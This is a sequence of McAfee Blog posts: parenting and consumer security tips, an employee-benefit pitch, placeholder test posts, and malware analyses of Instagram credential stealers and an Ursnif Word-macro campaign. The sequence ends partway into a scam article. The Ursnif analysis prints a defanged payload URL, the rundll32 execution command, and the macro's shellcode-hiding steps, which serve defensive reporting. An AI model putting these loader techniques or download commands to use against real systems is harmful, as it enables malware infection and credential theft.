1. Inventory Activities and Discuss Limits. Bring the whole family into the screen time discussion. What does an average day look like in your home? What activities can each person dream up outside of television, gaming, or social media? Where are the daily windows where consistent family time can happen? What kind of limits would be ideal? Discuss ways to keep one another accountable and a fun way to track success and consequences.  
2. Have plenty of non-screen activities ready.  One way to keep kids off their screens, is  offering them interesting options that outrank what’s happening on their devices. Consider, as a family, creating a list of at-home and on-the-go activities. Consider a trip to the lake, the beach, or a local museum. You might learn a new craft or pick a home project to complete (a bedroom makeover) together. Maybe try your hand at making pasta from scratch or growing your own vegetables. Activities don’t have to be pricey; often, simple is better. Whatever your list contains, remember: An idea is a dream without a real plan and taking real time to make it happen. 
3. Know where they go, what they see. As you know, at McAfee, we are front-line advocates of family filtering software. The content your kids consume this summer matters. Understanding the social networks and apps your kids frequent is key to keeping them safe this summer. The time and effort you spend establishing screen limits don’t matter much if the content your child views isn’t age-appropriate. A few questions to help assess content: 
   1. Is the content age-appropriate? Are the apps my child uses interactive and learning-based or mind-numbing, or even risky? 
   2. Do my family’s technology habits require filtering software to help block inappropriate websites? 
   3. Are the privacy settings on social media and gaming accounts set to restrict what strangers can see and who can send a direct message to my child?
4. Maintain a device curfew. Just because it’s summer, doesn’t mean anything goes. Consider keeping many of the same device rules in place. A device curfew in the summer months is more critical since kids like to take their devices to bed and scroll or text into the wee hours.    
5. Make sure they know why. This is a step some parents unintentionally may skip. Even if you find yourself repeating the ‘why’ of screen limits to your kids, make sure they understand you aren’t being random with the rules. Let them know that it’s a proven reality (studies show) that excessive screentime has an array of emotional and physical consequences that you aren’t willing to allow into your family. 
6. Step into their world.  Have you ever thought of picking up that game controller and playing your child’s favorite game with them? It’s a simple gesture that could build amazing bridges. Not only could it help you understand their digital routines and communities, but it would also open the door for consistent online safety discussions. If your child spends most of their time on TikTok or Snapchat, ask them to show you around the apps. Be teachable and open to their favorite online activities. (One of my personal mottos is that as a parent I must make every effort to be teachable if I expect my kids to be reachable)!

One mom on Facebook recently shared a powerful reminder that, as parents, we only have 18 summers with our kids before—poof—they are grown. She also shared an inspiring visual reminder. She keeps a clear jar with each of her children’s names on it in plain view. Inside each jar, she places 18 colorful tiny pom-poms. She subtracts one pom pom each year on their birthday. As the pom poms visually decrease, it reminds her to make the most of her time with each child. Here’s hoping your summer is packed with less screentime and more moments that make each pom pom count. 

The post 6 Tips to Help Your Balance Your Children’s Summer Screentime appeared first on McAfee Blog.

McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit

The topic most top of mind today for HR professionals is keeping and acquiring great talent.  One of the most important elements of doing both is providing a desirable and meaningful set of employee benefits.   

Digital Wellness is a New Pillar in the Employee Benefits Space 

The idea of Digital Wellness isn’t exactly brand new, but the world we’ve lived in for the past few years has cemented it into one of the main pillars of employee benefits, joining the traditional big three of Financial, Mental and Physical Wellness.   

Employees Are Spending the Majority of Their Time Online 

One of the main reasons Digital Wellness has become essential is that so many people have had to both live and work exclusively online for an extended period of time – spending 8+ hours a day on personal things in addition to all those hours they spend working via the web. Things like banking, telehealth and shopping to name a few.  

• 84% claim internet banking is the most important channel while interacting with their bank¹
• 75% have used telehealth services in the past 12 months²
• 49% of consumers are buying online more³  and 41% of those are shopping daily or weekly via mobile or smartphone⁴

There’s almost no aspect of life that isn’t touched by the internet for most people, especially when adding their work environment into the mix.  

Remote Work Isn’t Going Away

In addition to all the regular life they live online, employees have become accustomed to working remotely, even if it’s just part of the time. 

• 36.2 million workers are predicted to be working remotely by 2025 – an 87% increase from pre-pandemic levels⁵ 
• 59% of respondents in a study by Owl Labs said they would be more likely to choose an employer who offered remote work⁵
• 32% said they would quit their job if they were not able to continue working remotely⁵ 

With these kinds of stats, it’s hardly surprising that 74% of employers plan to maintain some sort of remote/hybrid workforce into the foreseeable future⁶.     

Cybercriminals are Taking Full Advantage of All the Extra Traffic  

The digital world has become a veritable smorgasbord for hungry cyber criminals. In fact, there’s been a 400% increase in cybercrime just over the last couple of years⁷. To put it in perspective, here are a few sobering statistics that happen on a daily basis:  

• 3 billion phishing emails are sent by scammers⁸ 
• 24,000 malicious mobile apps are blocked on average⁹
• 6.85 million accounts are hacked¹⁰

Unfortunately, all this means that people are in a constant battle to protect themselves from cyber risk.  

When Employees are at Risk, Their Employers are at Risk 

With everyone going about their daily activities and working whenever and wherever they happen to be at the time, it’s probably no surprise that more than half of employees are using their personal devices for work¹¹.  It’s just too convenient not to.  However, when you also realize that 95% of breaches are caused by human error¹², this intersection between personal life and work-life becomes risky for both the employees and their employers.  It’s no wonder that companies with a large number of employees working remotely have seen a 24% increase in breaches since the pandemic began¹³. 

Cyber Risk has Placed Huge Financial Strains on Companies 

When companies’ networks are breached it causes their customers to be vulnerable, risking a huge blow to their reputation and invoking serious fines and penalties due to compliance failures.  And trying to get cyber insurance to protect against financial loss has become increasingly more difficult.  A recent article by the Wall Street Journal reported that cyber insurance premiums rose 92% in 2021 and the hoops companies have to jump through are much more stringent to be eligible for the coverage – things like providing cyber education and ensuring they’re taking stronger steps to protect their network and customer data¹⁴.  

In addition to the direct financial impact of cyber threats, there’s also the loss of human capital.  It can take up to six months and up to 200 hours of a person’s time to address and correct identity theft¹⁵. If employees are focusing on digital healing, it’s a fair bet they’re not focusing as closely on their work. 

To Achieve Digital Wellness, Employees – and Their Employers, Need Two Things 

Preventative care is the first step toward Digital Wellness, and it consists of three, simple parts. 

1. Knowledge is power as they say, so cyber education is key.  For example, if an employee can identify those 3 billion phishing emails sent daily, they are much less likely to be wooed into clicking on dangerous links, and if they understand how important it is to create strong and unique passwords, they can help protect themselves even if they’re found in a data breach. 
2. Ward off threats by installing device protection to safeguard people’s access points to the internet. This means protecting all devices (PCs, Macs, smartphones, tablets, and smart home devices) against digital dangers like viruses/malware, unsecured network connections (thanks but no thanks, random coffeeshop Wi-Fi!), and spoofed/unsafe websites.  
3. Take back control of employees’ privacy and data. How? It can be done by doing things like installing a virtual private network (VPN) that encrypts unsecured Wi-Fi networks to make them safe from prying eyes, proactively monitoring the dark web for identity breaches and by identifying and cleaning up all the unneeded profiles that have been piling up over the years. 

Restorative care is the second step in the Digital Wellness journey.  If a digital threat sneaks through even after all the careful preventive care, it’s important to quickly remedy the situation. 

1. Kick uninvited cyber criminals out as soon as they’ve been discovered by removing viruses, malware, ransomware, etc. from each infected device as rapidly as possible.  
2. Identity stolen? Do a credit freeze then work on restoring your reputation by combating things like fraudulent unemployment claims, unauthorized lines of credit and unlawful home title transfers. 
3. Leverage financial restoration options to fix your damaged credit score and make your pocketbook whole again through cyber breach insurance. 

It’s Never Been More Important to Offer a Digital Wellness Solution as an Employee Benefit 

Great benefits that have real meaning for employees are key to helping retain and acquire amazing talent.  Providing an all-in-one and easy-to-use Digital Wellness solution designed to safeguard against compromised devices, privacy leaks, identity theft and other frustrating, time-consuming issues not only provides peace of mind for employees but also directly – and positively, impacts a company’s bottom line.  Choosing a trusted cyber protection solution like McAfee for your Digital Wellness benefit will give your employees a brand they love and your company the advantage of 30+ years of experience protecting people from digital threats.   

For more information on McAfee Digital Wellness, visit www.mcafee.com/employee-benefits-info or send an email to EmployeeBenefits@McAfee.com.  

Footnotes –  

1. Capgemini and Efma, World Retail Banking Report 2021 
2. 2021 McAfee Consumer Research Emerging Tech Trends Survey, December 2021 
3. McAfee’s 2020 Holiday Season: State of Today’s Digital e-Shopper survey 
4. PWC December 2021 Global Consumer Insights Pulse Survey 
5. Statistics on Remote Workers that Will Surprise You – May 11, 2022
6. Gartner CFO Survey 2020 
7. The Hill. “FBI seeks spike in cybercrime reports during coronavirus pandemic.” April 2020 
8. Zdnet.com – “Three billion phishing emails are sent every day. But one change could make life much harder for scammers” March 2021
9. TechJury- “How Many Cyber Attacks Happen Per Day in 2022?” May 2022 
10. 4. WCNC Charlotte – “How strong is your password? A professional hacker says probably not strong enough” June 2021 
11. IBM – Work from Home Study, 2020 
12. The Wall Street Journal. “Human Error Often the Culprit in Cloud Data Breaches.” August 2019 
13. Gartner. “Designing Security for Remote-Work First Enterprises” 
14. Wall Street Journal “Cyber Daily: Cyber Insurance Became Much Pricier in 2021” May 2022 
15. The Economist – “How to protect yourself against the theft of your identity

The post McAfee’s Digital Wellness Delivers Online Protection As An Employee Benefit appeared first on McAfee Blog.

Instagram credentials Stealers: Free Followers or Free Likes

Authored by Dexter Shin 

Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users are looking to increase their follower numbers, as this has become a symbol of a person’s popularity.  Instagram’s large user base has not gone unnoticed to cybercriminals. McAfee’s Mobile Research Team recently found new Android malware disguised in an app to increase Instagram followers. 

How can you increase your followers or likes? 

You can easily find apps on the internet that increase the number of Instagram followers. Some of these apps require both a user account and a password. Other types of apps only need the user to input their user account. But are these apps safe to use? 

Many YouTubers explain how to use these apps with tutorial videos. They log into the app with their own account and show that the number of followers is increasing. Among the many videos, the domain that appears repeatedly was identified. 

The way the domain introduces is very simple. 

1. Log in with user account and password. 
2. Check credentials via Instagram API. 
3. After logging in, the user can enjoy many features provided by the app. (free followers, free likes, unlimited comments, etc.) 
4. In the case of free followers, the user needs to input how many followers they want to gain.  

When you run the function, you can see that the number of followers increases every few seconds. 

How does this malware spread? 

Some Telegram channels are promoting YouTube videos with domain links to the malware. 

We have also observed a video from a famous YouTuber with over 190,000 subscribers promoting a malicious app. However, in the video, we found some concerning comments with people complaining that their credentials were being stolen. 

Behavior Analysis in Malware 

We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 

Conclusion 

As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 

SHA256: 

• e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 

• 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 

Domains: 

• https[://]insfreefollower.com 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

Instagram credentials Stealer: Disguised as Mod App

Authored by Dexter Shin 

McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with l@gmail.com. This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer(=www.googleapis.com) is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 

Conclusion 

As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 

SHA256: 

• 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

test article – McAfee Partner

test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…

Test

The post test article – McAfee Partner appeared first on McAfee Blog.

Test Test 2

https://origin-blogs.mcafee.com/blogs

The post Test Test 2 appeared first on McAfee Blog.

Test Post

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible. 

A recent spam campaign was using malicious word document to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server. 

 

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan. 

Threat Summary 

• The initial attack vector is a phishing email with a Microsoft Word document attachment. 
• Upon opening the document, VBA executes a malicious shellcode 

• Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it. 

Infection Chain 

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe 

 

Figure-1: flowchart of infection chain 

Word Analysis 

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.  

Figure-2: Image of what the user sees upon opening the document 

 

VBA Macro Analysis of Word Document 

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors.. 

 

Figure-3: Oleid output 

 

 

Figure-4: Olevba output 

 

 

 

 

 

 

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5 

 

Figure-5: Obfuscated VBA macro 

 

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below. 

 

Figure-6: De-obfuscated VBA macro (stage 1) 

Figure-7: De-obfuscated VBA macro (stage 2) 

 

 

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

    

Figure-8: Document properties 

 

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

 

Figure-9: Raw Company property 

 

The shellcode is  written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

 

Figure-10: Code of VirtualProtect 

 

 

Figure-11: Shellcode’s memory and protection after calling VirtualProtect() 

 

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

 

Figure-12: Environment variable set in Winword.exe space 

 

 

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

 

Figure-13: SetTimer function (Execution of shellCode) 

 

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

 

URL	hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/
CMD	rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer

 

 

Figure-14: Exports of Downloaded DLL 

 

After successful execution of the shellcode, the environment variable is removed. 

 

Figure-15: Removal of Environment Variable 

IOC 

TYPE	VALUE	PRODUCT	DETECTION NAME
Main Word Document	6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f	McAfee LiveSafe and Total Protection	X97M/Downloader.CJG
Downloaded dll	41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547	McAfee LiveSafe and Total Protection	Ursnif-FULJ
URL to download dll	hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/	WebAdvisor	Blocked

 

MITRE Attack Framework 

Technique ID	Tactic	Technique Details	Description
T1566.001	Initial Access	Spear phishing Attachment	Manual execution by user
T1059.005	Execution	Visual Basic	Malicious VBA macros
T1218.011	Defense Evasion	Signed binary abuse	Rundll32.exe is used
T1027	Defense Evasion	Obfuscation techniques	VBA and powershell base64 executions
T1086	Execution	Powershell execution	PowerShell command abuse

 

Conclusion 

Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Test Post appeared first on McAfee Blog.

How to Know If Your Mobile Finance Apps Are Safe

Mobile banking and finance apps have become increasingly popular in recent years. These apps provide a quick and convenient way to see checking and savings account balances and make and receive payments.  

It’s no surprise that many people use these third-party apps to manage their finances. In 2021, the U.S. saw 573.1 million finance app downloads, a 19% increase from the previous year. 

However, despite its benefits, mobile banking isn’t immune to risks. This article will discuss the safety and security of mobile finance apps and give you a few pointers to protect yourself while using these apps. 

Is mobile banking safe?

Yes, mobile banking is a pretty safe way to manage your finances; however, there can still be some risks associated with it, including fraud and scams.  

If you’re careful, there are plenty of ways to protect yourself while using this incredibly easy banking method. 

6 tips to improve mobile finance app security

Here are a few tips to help you improve the safety of your online financial accounts. 

Ensure you’re downloading the official app

A bank’s website will often include links to their mobile apps that provide related mobile banking services, along with details about the app’s features and how users can use it. You should use a trusted platform when installing the app, like the App Store for iPhone or iOS users or the Google Play Store for Android users.  

You should also take time to go through reviews and related information about the app before downloading it to ensure its legitimacy. If you have any doubts, clarify the issue with your bank before downloading what could be a fake banking app. 

Set a strong password 

While this may seem obvious, the reality is that many people don’t pay enough attention to their passwords. To create a strong password, you should use a combination of uppercase and lowercase letters, numbers, and special characters in no particular order or pattern.  

In addition, security experts recommend long, complex passwords to exponentially increase the time it takes to crack them. It also helps to have unique passwords for each of your accounts.  

If you’re concerned about remembering and managing multiple passwords, you can use a reputable and secure password manager like McAfee True Key to store your passwords.  

Use two-factor authentication when possible

Many services nowadays offer two-factor or multifactor authentication. This function refers to the additional layers of security against hackers. On top of a traditional username-password login, users are required to identify themselves with a code that’s sent to their cellphone or email. 

By confirming the user’s identity this way, organizations eliminate a degree of uncertainty. While it isn’t foolproof, two-factor or multifactor authentication helps increase security. It’s worth checking if your finance app offers this feature. 

Avoid public Wi-Fi when using finance apps

Public Wi-Fi networks are convenient in urgent situations; however, they often come with a warning saying the network is unsecured. This means that the network is unencrypted, making it easy for hackers to access your personal information. The best practice is to avoid using public Wi-Fi networks, especially when carrying out any form of financial transaction.  

If you need to make purchases or send and receive money while on the move, though, you’ll want to consider a virtual private network (VPN) like McAfee Secure VPN. The VPN provides a secure network even when using public Wi-Fi by hiding your IP address and encrypting your data. 

Get email/text alerts for potential fraud

The easiest way to protect your finances is to keep a vigilant eye on all of your transactions. However, security notifications from your bank are a great added measure. Most credit card companies allow you to turn on transaction alerts for various services, such as balance transfer requests, international purchases, and exceeded credit limits, which can help you recognize any suspicious activity on your account.  

It’s also important to remember that financial institutions will never contact you over the phone or through email to ask for your banking information. If you receive such a message, it’s most certainly a scam. A common way people get duped is through calls or emails claiming they’ve won a prize and need to share personal account details to receive the money. Never share your bank account details, passwords, or one-time codes with strangers.  

Always check with your bank to confirm any activity that seems out of the ordinary. In addition to alert notifications, banks can also send helpful tips to protect your account against fraud. 

Use McAfee Security for Mobile

McAfee Security for Mobile is an award-winning cybersecurity tool that helps address the issues mentioned above and more. It’ll scan your device for malware, suspicious websites, and unsecured Wi-Fi networks so you can use social media or shop online with complete peace of mind.  

It also comes with other features, like system cleaning services that clean junk from your phone’s storage. These features can boost battery life and help locate your phone if it’s ever stolen or misplaced.  

Are mobile banking apps as safe as online banking?

Mobile and online banking both have their benefits and drawbacks, but which is the safer option? Experts often have varied opinions on the matter.  

Some people believe it might be easier to download malware on a computer unknowingly, as it’s tricky to judge the authenticity of a website or malicious links. Users typically download apps from reputed app stores when using mobile devices, which lowers the risk. 

On the other hand, professionals believe that both methods are equally safe. The choice depends on the network available to the user, as private networks are significantly less susceptible to hacking than public ones. Some users may prefer computers to mobile phones simply because they find it easier to perform tasks on a bigger screen. 

See how McAfee Security for Mobile keeps your device safe

Both internet and mobile banking are convenient and offer a quick way to manage your personal finances, as you don’t have to travel to a physical bank or carry large amounts of cash in your wallet.  

However, while mobile banking is generally considered a safe method of managing your finances, it can have some vulnerabilities that scammers may try to take advantage of. 

Following the tips mentioned above — like using a private network, not sharing personal details with anyone, and using a comprehensive mobile security tool like McAfee Security for Mobile — can make all the difference.  

The tool’s security features include safe browsing, a secure VPN, and antivirus software. This means you can use your mobile finance apps confidently knowing McAfee is looking out for you. 

The post How to Know If Your Mobile Finance Apps Are Safe appeared first on McAfee Blog.

8 Ways to Know If Online Stores Are Safe and Legit

The explosion of e-commerce sites has changed how we shop today, providing access to millions of online stores with almost unlimited selections.  

Just as you would take basic precautions in a brick-and-mortar store — perhaps hiding your PIN number while paying and making sure the business is legitimate — you should also practice safe shopping habits online. 

Here are eight ways you can avoid fake websites and other online scams and ensure that you’re dealing with legitimate companies and safe online stores. 

Use the free McAfee WebAdvisor to check for safe sites

One of the best ways to tell if an online store is legit and avoid debit and credit card scams, domain name and subdomain name takeovers, and other problems is with a free and effective download like McAfee WebAdvisor. 

This smart tool helps you surf and shop with confidence, protecting you from malicious sites that can contain:  

• Adware: Pop-ups that might be infected with malware 
• Spyware: Software downloaded without the user’s consent, perhaps passing on sensitive personal information to advertisers or cybercriminals. 
• Viruses: Pieces of code that can copy themselves and typically have a negative effect, such as slowing down your system or destroying data 
• Phishing scams: When hackers send duplicitous emails designed to trick people into falling for a scam to reveal financial information, system credentials, or other sensitive data 

McAfee WebAdvisor is a free browser extension that downloads quickly and installs easily, working in the background automatically to protect you from malware and phishing as you surf, search, and enjoy online shopping. 

McAfee WebAdvisor works with Windows 10, 8.1, 8, and 7 (32- and 64-bit) computers and is compatible with these browsers: 

• Internet Explorer 10.0 or later 
• Microsoft Edge (Chromium-based) 
• Microsoft Edge (Windows 10 only; Fall Creators Update required) 
• Mozilla Firefox 
• Google Chrome 

Here are other ways to make sure you know when you’re dealing with scammers online.  

Check the padlock in the address bar

When checking an e-commerce site’s credentials, start with the address bar. Often, hackers will use URLs that are very close to the real site’s URL but not quite the same. Look for typos or use Google to see if a search takes you to the same page. Also, look for a padlock icon in the address bar. 

Click the padlock and look at the drop-down menu that provides information, such as if the site has a valid certificate like SSL (verifying that the web address belongs to the company), how many cookies are in use, other site settings, and whether your information is safe when sent to this site. 

The protection is pretty good but not perfect since some cybercriminals have been able to replicate these padlocks or take over legitimate sites that have them. 

Verify the website’s trust seal

Trust seals, such as the TrustedSite certification, are stamps created by a certificate authority (CA) to confirm the legitimacy of a site. A trust seal tells visitors that they are on a safe site and the company that displays the mark prioritizes cybersecurity. Click on it, and you should be taken to a webpage that verifies the authenticity of the trust seal. 

Use the Google Transparency Report

Google’s Safe Browsing technology crawls through billions of web addresses every day on the lookout for unsafe websites. The technology discovers thousands daily — often legitimate sites that have been compromised. Warnings for unsafe sites pop up in your browser and on the Google search engine. You can also search specific URLs to see if a site has been compromised.  

Check the company’s social media presence

It’s worth checking a company on social media to see if they appear to have a genuine following and legitimate posts. The Better Business Bureau (BBB) also has suggestions for spotting fake social media accounts, including those on LinkedIn, Facebook, Twitter, and Instagram. You should look for: 

• Accounts with poor or no content and stock or recycled images 
• Poor engagement with followers 
• Lack of transparency about who runs the account 
• Phony reviews 
• Links to phishing scams and malware 

Review the company’s contact info

Another way to test the legitimacy of an online retail store is to check its contact information. Does it have a physical address, phone number, and email contact? Does the email address on the contact page have the company domain name in it, or is it generic (like a Gmail address)? If you send an email, does it get delivered? 

Analyze the overall look of the website

Check to see if the e-commerce site looks as if it has been professionally produced or whether it has been thrown together with slapdash results. Are there typos, grammar errors, poor-quality images, and a sloppy design? Does it have a poorly worded return policy or no return policy at all?  

All the things that undermine the professional appearance and authenticity of a site should be red flags and convince you that you’re on a scam website.  

Verify if there are company reviews

If the online company is a legitimate website (not a scam site) and has been around for a while, there should be authentic third-party reviews from previous customers. Review sites include Google My Business, Amazon, and Yelp. 

If the reviews are uniformly bad, on the other hand, you have another type of problem to confront. 

See how McAfee WebAdvisor can keep you safe while shopping online

Since virtual shopping is fast becoming the new norm, it’s important to guard against cybercriminals that are increasingly targeting retailers and their customers. A great way to shop with confidence is to use McAfee WebAdvisor, which is available as a free download. 

The web browser extension works tirelessly in the background to protect you as you browse and buy. Think of it as a gift to yourself so you can use the internet to its full potential while keeping your information protected. 

The post 8 Ways to Know If Online Stores Are Safe and Legit appeared first on McAfee Blog.

Wedding Planning App Users Hacked Before the Big Day

Say you’re getting married. You and your partner have booked the venue, made the seating arrangements, trained your dog to be the ring bearer – and everything is running smoothly. You’ve used a trusty wedding planning website to make everything a breeze. Nothing could ruin this day for you! Except, there’s an uninvited guest. They’re not crashing the wedding and making an awkward toast, but they’ve crashed into your wedding planning website account and now have access to your information.  

There are many things that could go wrong during wedding planning – some of them out of anyone’s control. Maybe the caterer canceled last minute, or the live band is stuck in traffic. Other things may be easily avoided, but you don’t necessarily see them coming. Like a hacker accessing your wedding website and making fraudulent bank transfers right before your big day. 

The Wedding Crasher 

Zola, a wedding planning site allowing couples to create websites, budgets, and gift registries, confirmed that hackers had managed to access the accounts of some of their users, The Verge reported. Once these accounts were infiltrated, hackers used the linked bank accounts or funds held inside the site to make cash transfers. The main method these cybercriminals used was purchasing gift cards through the user’s account and sending them to their email addresses to avoid being easily traced. 

These criminals did not hack the Zola website itself but hacked their users’ accounts with a method called credential stuffing. This is a strategy where hackers take email and password combinations involved in previous breaches of other websites and use them to log into other online profiles. 

You may not even know that your information had been breached previously and that cybercriminals now had your logins for a number of different accounts. Luckily, there are ways to protect yourself and your information from credential stuffing tactics to stop hackers in their tracks. 

Tell Credential Stuffing to Go Stuff It 

Just because you’ve hypothetically grown up and are ready for lifelong commitments doesn’t mean you’ve outgrown those old trusty email addresses and passwords (hello, “basketball4life23”). There’s a level of nostalgia that comes with using the email account that you made in middle school, or maybe you just haven’t gotten around to changing it. However, keeping those old email addresses and logins are doing you more harm than good. Want to make sure that hackers aren’t able to credential stuff your accounts? Here are some trusty tips to keep your information safe. 

Track down and close old accounts 

The best way to know that your old accounts aren’t coming back to haunt you is to make sure those ancient logins are dead and gone. If you don’t remember all the accounts you’ve made and no longer use, don’t sweat it! There are settings through your internet browser that will show you all the accounts and passwords you have saved. A password manager also keeps track of all your credentials, so you don’t have to wrack your brain to try and remember every account you’ve ever made. Once you’ve gone through all your old online accounts you no longer use, close them for good! Though this step will require some time and patience, it’s always better to put in the effort and know your information is safe than to risk it. 

Create strong and unique passwords 

Only having to remember one password for every account may make logging in easier, but ensuring that each of your accounts is unique and secure is worth the extra effort. Having a strong and unique password for each of your accounts helps protect them from credential stuffing and other threats. Varying your passwords across online accounts will assure you that if one of them is breached, the others will remain safe. A password manager can also help with this step, because many of them, such as True Key, can generate strong, random, and unique passwords for every account. 

Update credentials when necessary 

Keep an eye out to make sure that if a website or company you have an account with is breached, you are updating your credentials so that hackers can’t access them. If you see that there has been a hack and your information is vulnerable, immediately update your logins and passwords on that account to keep yourself safe. 

Use multifactor authentication 

Using multifactor authentication adds an extra layer of protection to your accounts. This safety measure requires more than one method of identity verification to access the account, helping to prevent criminals from gaining access to your password-protected information.   

Don’t let cybercriminals get the jump on you! Take the necessary steps to protect your accounts and your personal information. Though combing through your old accounts and deleting them or coming up with a new and unique password for every site login isn’t a glamourous activity, you’ll enjoy greater peace of mind that your accounts are safe, leaving you free to enjoy life’s best moments.  

The post Wedding Planning App Users Hacked Before the Big Day appeared first on McAfee Blog.

How to Recognize an Online Scammer

The great thing about the internet is that there’s room for everyone. The not-so-great part? There’s plenty of room for cybercriminals who are hungry to get their hands on our personal information.  

Fortunately, internet scams don’t have to be a part of your online experience. In this article, we’ll tell you about some of the most common internet schemes and how you can recognize them to keep your identity safe. 

5 tips to help you recognize an online scam

